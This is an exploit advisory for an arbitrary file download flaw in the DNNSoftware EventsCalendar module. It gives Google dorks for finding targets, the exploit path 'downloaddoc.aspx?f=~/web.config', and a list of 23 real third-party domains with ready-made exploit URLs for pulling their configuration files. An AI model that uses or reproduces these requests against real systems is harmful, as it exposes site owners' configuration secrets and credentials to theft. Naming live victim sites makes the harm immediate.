####################################################################
# Exploit Title : DNNSoftware EventsCalendar Modules 1.x Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/01/2019
# Vendor Homepage : dnnsoftware.com
# Software Information Link : store.dnnsoftware.com/home/product-details/events-calendar
# Software Version : 1.x and All Versions
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Copyright 2019 by Associated Builders and Contractors''
inurl:''/desktopmodules/eventscalendar/''
# Vulnerability Type : CWE-16 [ Configuration ]
####################################################################
# Description :
*************
* Events Calendar is a calendar to add and display events with time and description in rich text editor.
* DotNetNuke DNNSoftware Events Calendar Modules 1.x and other versions
is prone to a vulnerability that lets attackers download arbitrary files because
the application fails to sufficiently verify user-supplied input.
* This may allow an attacker to gain access to sensitive information, which may aid in launching further attacks.
* The attacker can download and read all and any files known by the name via '?f=' parameter.
# Arbitrary File Download Exploit :
*******************************
/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
/desktopmodules/eventscalendar/downloaddoc.aspx?f=[DOWNLOAD-ANY-FILE]
####################################################################
# Example Vulnerable Sites :
*************************
Note : (38.95.37.77) => There are 73 domains hosted on this server.
[+] abcga.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] abcgmc.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] mnabc.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] abclaventura.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] abccarolinas.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] abcnjc.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] abcpnw.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] abcwestwa.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] abc-chesapeake.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] ocl.net/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] aeawave.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] tkhobby.nu/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] abcark.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] av-warehouse.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] nocabc.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] ezt.ca/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] abccentralcal.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] abcwpa.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] abcnevada.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] abcsocal.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] ctabc.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] abcalaska.org/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
[+] abcfirstcoast.com/desktopmodules/eventscalendar/downloaddoc.aspx?f=~/web.config
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################